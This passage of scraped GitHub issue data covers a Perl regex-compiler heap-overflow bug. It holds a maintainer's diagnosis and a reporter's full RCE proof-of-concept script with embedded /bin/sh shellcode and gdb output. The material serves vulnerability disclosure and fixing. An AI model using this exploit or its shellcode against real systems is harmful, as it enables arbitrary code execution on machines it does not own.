NzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ0Mw==","body":"### From @khwilliamson\n\nResending this as it did not make it to the list\u0026#8203;:\n\nOn Wed\\, 15 Aug 2018 11\u0026#8203;:01\u0026#8203;:24 \\-0700\\, khw wrote\u0026#8203;:\n\u003e I suspect this is a serious security issue\\. One can position where\n\u003e beyond the end of buffer gets written by adding \\\\x80's to the ones\n\u003e already there\\. But I'd be happy to be wrong about this\\.\n\u003e \n\u003e The cause is one branch during the parsing leaves the parse pointer\n\u003e positioned one too far\\, and that causes the backslash to be skipped\n\u003e during pass2\\, which causes a '\\]' to be treated as a metacharacter\n\u003e instead of a literal\\.\n\u003e \n\u003e The fix is to remove the single line that incorrectly increments the\n\u003e parse pointer\\.\n\u003e I don't know that this being an experimental feature has any bearing\n\u003e on it\\.\n\u003e \n\u003e There is another thing\\. The minus sign in this case could have been\n\u003e caught as incorrect\\. 
But the same out\\-of\\-bounds writes would occur if\n\u003e a '^' replaced the minus\\, and that would be a correct use\\.\n\u003e \n\u003e Karl Williamson","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/khwilliamson/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/khwilliamson\"\u003e@khwilliamson\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eResending this as it did not make it to the list​:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOn Wed, 15 Aug 2018 11​:01​:24 -0700, khw wrote​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eI suspect this is a serious security issue. One can position where\u003cbr\u003e\nbeyond the end of buffer gets written by adding \\x80's to the ones\u003cbr\u003e\nalready there. But I'd be happy to be wrong about this.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe cause is one branch during the parsing leaves the parse pointer\u003cbr\u003e\npositioned one too far, and that causes the backslash to be skipped\u003cbr\u003e\nduring pass2, which causes a ']' to be treated as a metacharacter\u003cbr\u003e\ninstead of a literal.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe fix is to remove the single line that incorrectly increments the\u003cbr\u003e\nparse pointer.\u003cbr\u003e\nI don't know that this being an experimental feature has any bearing\u003cbr\u003e\non it.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThere is another thing. The minus sign in this case could have been\u003cbr\u003e\ncaught as incorrect. 
But the same out-of-bounds writes would occur if\u003cbr\u003e\na '^' replaced the minus, and that would be a correct use.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eKarl Williamson\u003c/p\u003e\n\u003c/blockquote\u003e","bodyVersion":"2c1e4205360a04dbd9305d34579360f777ec1acb3dd27b22a03480674c127400","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097443","createdAt":"2018-08-16T03:52:55Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZUDdYdgAqTU0NDA5NzQ0Mw=="},{"node":{"__typename":
"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097445,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ0NQ==","body":"### From @Etsukata\n\nThe following code generates a regexp which executes arbitrary command\nduring global destruction\\.\nIt overwrites some SV pointer address to a crafted fake SV on overwritten\nheap which has the malicious svt\\_free\\(shell\\_code\\) on its magic vtable\\.\n\nLimitations\u0026#8203;:\n\n\u0026nbsp; \\- must set \\`execstack \\-s\\` to perl\n\u0026nbsp; \\- require address leak\\(exact address of overwritten heap\\)\n\n\\`\\`\\`\n\\#\\!/usr/bin/perl\n\n\\#\n\\# RCE exploit PoC for\n\\# \\[perl \\#133423\\] regcomp\u0026#8203;: heap\\-buffer\\-overflow write\n\\# on perl\\-blead\\-48ae8dc\n\\#\n\nuse strict;\nuse warnings;\n\n\\# 0xabcd =\u003e '\\\\xcd\\\\xab\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00'\nsub h2s \\{\n\u0026nbsp; my $h = shift;\n\u0026nbsp; my $sz = shift;\n\u0026nbsp; my $ret = '';\n\u0026nbsp; for \\(0\\.\\.\\($sz \\- 1\\)\\) \\{\n\u0026nbsp; $ret \\.= sprintf\\(\"\\\\\\\\x%02x\"\\, \\(\\($h \u003e\u003e \\(8 \\* $\\_\\)\\) \u0026 0xff\\)\\);\n\u0026nbsp; \\}\n\u0026nbsp; return $ret\n\\}\n\n\\# must set \\`execstack \\-s\\` to perl\nmy $cmd = 'gdb \\-q \\-\\-args ~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl\n\\-DorD \\-le ';\nmy $prefix = '\\\\'my $r = \"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\\\\\\\\\a\\]\\)\\)\\\\\\\\\\\\\\\\\\]a\\\\x00';\n\nmy $address = 0xa34c7d; \\# overwrite start address\n\u0026nbsp; \\# search with\u0026#8203;:\n\u0026nbsp; \\# \\(gdb\\) b regcomp\\.c\u0026#8203;:14044\n\u0026nbsp; \\# 
\\(gdb\\) p s\n\u0026nbsp; \\# \\[CAUTION\\] must not contain '\\]' \\(0x5d\\)\n\u0026nbsp; \\#\nmy $sv\\_any\\_address = $address \\+ 8 \\+ 4 \\+ 4 \\+ 8;\nmy $stash\\_address = $sv\\_any\\_address \\+ 8 \\+ 8;\nmy $stash\\_address2 = $stash\\_address \\+ 8 \\+ 4 \\+ 4;\nmy $magic\\_address = $stash\\_address \\+ 8 \\+ 4 \\+ 4 \\+ 8 \\+ 8 \\+ 8 \\+ 19 \\+ 8;\nmy $mg\\_virtual\\_address = $magic\\_address \\+ 8 \\+ 8 \\+ 2 \\+ 1 \\+ 1 \\+ 8 \\+ 8 \\+ 8;\nmy $shell\\_code\\_address = $mg\\_virtual\\_address \\+ 8 \\+ 8 \\+ 8 \\+ 8 \\+ 8;\n\nmy $body =\n\\# sv\\($address\\)\n\u0026nbsp; h2s\\($sv\\_any\\_address\\, 8\\)\n\\. h2s\\(0x01\\, 4\\) \\# sv\\_refcnt\n\\. h2s\\(0x100007\\, 4\\) \\# sv\\_flags \\(SVt\\_PVMG || SVs\\_OBJECT\\)\n\\. h2s\\(0x00\\, 8\\) \\# sv\\-\u003esv\\_u\\.svu\\_pv\n\\# any\\($sv\\_any\\_address\\)\n\\. h2s\\($stash\\_address\\, 8\\) \\# HV\\* xmg\\_stash\n\\. h2s\\($magic\\_address\\, 8\\) \\# union \\_xmgu xmg\\_u \\(MAGIC\\* xmg\\_magic\\)\n\n\\# xmg\\_stash\\($stash\\_address\\)\n\\. h2s\\($stash\\_address2\\, 8\\) \\# sv\\_any\n\\. h2s\\(0x01\\, 4\\) \\# sv\\_refcnt\n\\. h2s\\(0x0c\\, 4\\) \\# sv\\_flags \\(SVt\\_PVHV\\)\n\\# any\\($stash\\_address2\\)\n\\. h2s\\(0x00\\, 8\\) \\# HV\\* xmg\\_stash\n\\. h2s\\($magic\\_address\\, 8\\) \\# union \\_xmgu xmg\\_u \\(MAGIC\\* xmg\\_magic\\)\n\\. h2s\\(0x00\\, 8\\) \\# padding\n\n\\. '\" \\. \"a\" x 19 \\. \"' \\# padding\n\\. h2s\\($address\\, 8\\) \\# OVERWRITE gvp\n\n\\# xmg\\_magic\\($magic\\_address\\)\n\\. h2s\\(0x00\\, 8\\) \\# MAGIC\\* mg\\_moremagic;\n\\. h2s\\($mg\\_virtual\\_address\\, 8\\) \\# MGVTBL\\* mg\\_virtual /\\* pointer to magic\nfunctions \\*/\n\\. h2s\\(0x00\\, 2\\) \\# U16 mg\\_private;\n\\. h2s\\(0x00\\, 1\\) \\# char mg\\_type;\n\\. h2s\\(0x00\\, 1\\) \\# U8 mg\\_flags;\n\\. h2s\\(0x00\\, 8\\) \\# SSize\\_t mg\\_len;\n\\. h2s\\(0x00\\, 8\\) \\# SV\\* mg\\_obj;\n\\. h2s\\(0x00\\, 8\\) \\# char\\* mg\\_ptr;\n\n\\# mg\\_virual\\($mg\\_virtual\\_address\\)\n\\. 
h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_get\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_set\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. h2s\\(0x00\\, 8\\) \\# U32 \\(\\*svt\\_len\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\\. h2s\\(0x00\\, 8\\) \\# int \\(\\*svt\\_clear\\)\\(pTHX\\_ SV \\*sv\\, MAGIC\\* mg\\);\n\\. h2s\\($shell\\_code\\_address\\, 8\\) \\# int \\(\\*svt\\_free\\) \\(pTHX\\_ SV \\*sv\\, MAGIC\\*\nmg\\);\n\n\\# x86\\_64 shell\\_code\n\\.\n'\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05'\n\n\\. '\\]\\)a\\\\\\\\\\\\\\\\6\"; qr/$r/\\\\'';\n\nmy $payload = $prefix \\. $body;\n\nprint $cmd \\. $payload \\. \"\\\\n\";\n\\`\\`\\`\n\nSample output\n\n\\`\\`\\`\n\\[eiichi@\u0026#8203;x1 exploit\\]$ perl perl\\_regexp\\_mg\\_free\\.pl\ngdb \\-q \\-\\-args ~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le\n'my $r =\n\"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]a\\\\x00\\\\x95\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\"\n\\. 
\"a\" x 19 \\.\n\"\\\\x7d\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x14\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05\\]\\)a\\\\\\\\6\";\nqr/$r/'\n\\[eiichi@\u0026#8203;x1 exploit\\]$ gdb \\-q \\-\\-args\n~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le 'my $r =\n\"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]a\\\\x00\\\\x95\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\"\n\\. 
\"a\" x 19 \\.\n\"\\\\x7d\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x14\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05\\]\\)a\\\\\\\\6\";\nqr/$r/'\nReading symbols from\n/home/eiichi/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl\\.\\.\\.done\\.\n\\(gdb\\) b regcomp\\.c\u0026#8203;:14044\nBreakpoint 1 at 0x4cb38d\u0026#8203;: file regcomp\\.c\\, line 14044\\.\n\\(gdb\\) run\nStarting program\u0026#8203;:\n/home/eiichi/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le my\\\\\n\\\\$r\\\\ 
=\\\\\n\\\\\"\\\\\\(\\\\?\\\\\\[\\\\\\(\\\\?x\u0026#8203;:\\\\\\(\\\\?\\\\\\[\\\\\\\\\\\\\\\\a\\\\\\]\\\\\\)\\\\\\)\\\\\\\\\\\\\\\\\\\\\\]a\\\\\\\\x00\\\\\\\\x95\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x01\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x07\\\\\\\\x00\\\\\\\\x10\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xa5\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xe8\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xb5\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x01\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x0c\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xe8\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\"\\\\\n\\.\\\\ \\\\\"a\\\\\"\\\\ x\\\\ 19\\\\ 
\\.\\\\\n\\\\\"\\\\\\\\x7d\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x14\\\\\\\\x4d\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x3c\\\\\\\\x4d\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x48\\\\\\\\x31\\\\\\\\xd2\\\\\\\\x52\\\\\\\\x48\\\\\\\\xb8\\\\\\\\x2f\\\\\\\\x62\\\\\\\\x69\\\\\\\\x6e\\\\\\\\x2f\\\\\\\\x2f\\\\\\\\x73\\\\\\\\x68\\\\\\\\x50\\\\\\\\x48\\\\\\\\x89\\\\\\\\xe7\\\\\\\\x52\\\\\\\\x57\\\\\\\\x48\\\\\\\\x89\\\\\\\\xe6\\\\\\\\x48\\\\\\\\x8d\\\\\\\\x42\\\\\\\\x3b\\\\\\\\x0f\\\\\\\\x05\\\\\\]\\\\\\)a\\\\\\\\\\\\\\\\6\\\\\"\\\\;\\\\\nqr/\\\\$r/\n\\[Thread debugging using libthread\\_db enabled\\]\nUsing host libthread\\_db library \"/lib64/libthread\\_db\\.so\\.1\"\\.\nwarning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\nwarning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\nwarning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\n\\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing 
PL\\_stashcache\n\\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\\(\\-e\u0026#8203;:0\\) sv\\_upgrade clearing PL\\_stashcache\n\\(\\-e\u0026#8203;:2\\) Looking for DESTROY method for IO\u0026#8203;::File\n\\(\\-e\u0026#8203;:2\\) Looking for method DESTROY in package IO\u0026#8203;::File\n\\(\\-e\u0026#8203;:2\\) Looking for method DESTROY in package UNIVERSAL\n\\(\\-e\u0026#8203;:2\\) Looking for method AUTOLOAD in package IO\u0026#8203;::File\n\\(\\-e\u0026#8203;:2\\) Looking for method AUTOLOAD in package UNIVERSAL\n\\(\\-e\u0026#8203;:2\\) Set cached DESTROY method 0 for IO\u0026#8203;::File\nEnabling $\\` $\u0026 $' support \\(0x7\\)\\.\n\nEXECUTING\\.\\.\\.\n\nCompiling REx\n\"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\a\\]\\)\\)\\\\\\]a%0%x\\{95\\}L%x\\{a3\\}%0%0%0%0%0%1%0%0%0%7%0%20%0\"\\.\\.\\.\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[ \\\u003c\\-\\- HERE \\(?x\u0026#8203;:\\(?\\[\\\\a\\]\\)\\)\\\\\\]a?L??L???L?\n\n\n ?aaaaaaaaaaaaaaaaaaa\\}L?M?\\\u003cM?H1H?/bin//shPH?WH??B;\\]\\)a\\\\6/ at \\-e line 1\\.\nThe regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in\nm/\\(?\\[\\(?x\u0026#8203;:\\(?\\[ \\\u003c\\-\\- HERE \\\\a\\]\\)\\)\\\\\\]a?L??L???L?\n\n\n ?aaaaaaaaaaaaaaaaaaa\\}L?M?\\\u003cM?H1H?/bin//shPH?WH??B;\\]\\)a\\\\6/ at \\-e line 1\\.\n\nBreakpoint 1\\, S\\_regatom \\(pRExC\\_state=pRExC\\_state@\u0026#8203;entry=0x7fffffffcd40\\,\nflagp=flagp@\u0026#8203;entry=0x7fffffffca24\\,\n\u0026nbsp; depth=depth@\u0026#8203;entry=4\\) at regcomp\\.c\u0026#8203;:14044\n14044 \\*\\(s\\)\\+\\+ = \\(U8\\) ender;\nMissing separate debuginfos\\, use\u0026#8203;: dnf debuginfo\\-install\nkeyutils\\-libs\\-1\\.5\\.10\\-6\\.fc28\\.x86\\_64 krb5\\-libs\\-1\\.16\\.1\\-13\\.fc28\\.x86\\_64\nlibcom\\_err\\-1\\.44\\.2\\-0\\.fc28\\.x86\\_64\nlibnsl2\\-1\\.2\\.0\\-2\\.20180605git4a062cf\\.fc28\\.x86\\_64 
libselinux\\-2\\.8\\-1\\.fc28\\.x86\\_64\nlibtirpc\\-1\\.0\\.3\\-3\\.rc2\\.fc28\\.x86\\_64 libxcrypt\\-4\\.1\\.1\\-4\\.fc28\\.x86\\_64\nopenssl\\-libs\\-1\\.1\\.0h\\-3\\.fc28\\.x86\\_64 pcre2\\-10\\.31\\-8\\.fc28\\.x86\\_64\nzlib\\-1\\.2\\.11\\-8\\.fc28\\.x86\\_64\n\\(gdb\\) p s\n$1 = 0xa34c7d \"\"\n\\(gdb\\) b S\\_mg\\_free\\_struct\nBreakpoint 2 at 0x4f0620\u0026#8203;: file mg\\.c\\, line 556\\.\n\\(gdb\\) dis br 1\n\\(gdb\\) c\nContinuing\\.\npanic\u0026#8203;: reg\\_node overrun trying to emit 0\\, a34d5c\u003e=a34c8c at \\-e line 1\\.\nCleaning named glob SV object\u0026#8203;:\n SV = PVMG\\(0xa34c95\\) at 0xa34c7d\n\u0026nbsp; REFCNT = 1\n\u0026nbsp; FLAGS = \\(OBJECT\\)\n\u0026nbsp; IV = 0\n\u0026nbsp; NV = 5\\.28751820946919e\\-317\n\u0026nbsp; PV = 0\n\u0026nbsp; MAGIC = 0xa34ce8\n\u0026nbsp; MG\\_VIRTUAL = 0xa34d14\n\u0026nbsp; MG\\_TYPE = PERL\\_MAGIC\\_sv\\(\\\\0\\)\n\u0026nbsp; STASH = 0xa34ca5\n\nBreakpoint 2\\, S\\_mg\\_free\\_struct \\(sv=sv@\u0026#8203;entry=0xa34ca5\\, mg=0xa34ce8\\) at\nmg\\.c\u0026#8203;:556\n556 const MGVTBL\\* const vtbl = mg\\-\u003emg\\_virtual;\n\\(gdb\\) bt\n\\#0 S\\_mg\\_free\\_struct \\(sv=sv@\u0026#8203;entry=0xa34ca5\\, mg=0xa34ce8\\) at mg\\.c\u0026#8203;:556\n\\#1 0x00000000004f1153 in Perl\\_mg\\_free \\(sv=sv@\u0026#8203;entry=0xa34ca5\\) at mg\\.c\u0026#8203;:588\n\\#2 0x0000000000527d9e in Perl\\_sv\\_clear \\(orig\\_sv=orig\\_sv@\u0026#8203;entry=0xa34ca5\\) at\nsv\\.c\u0026#8203;:6539\n\\#3 0x0000000000528784 in Perl\\_sv\\_free2 \\(sv=0xa34ca5\\, rc=\\\u003coptimized out\u003e\\)\nat sv\\.c\u0026#8203;:7038\n\\#4 0x00000000005273ec in S\\_SvREFCNT\\_dec \\(sv=\\\u003coptimized out\u003e\\) at\ninline\\.h\u0026#8203;:216\n\\#5 S\\_curse \\(sv=sv@\u0026#8203;entry=0xa34c7d\\, check\\_refcnt=check\\_refcnt@\u0026#8203;entry=true\\) at\nsv\\.c\u0026#8203;:6970\n\\#6 0x000000000052783a in Perl\\_sv\\_clear \\(orig\\_sv=orig\\_sv@\u0026#8203;entry=0xa34c7d\\) at\nsv\\.c\u0026#8203;:6531\n\\#7 0x0000000000528784 in 
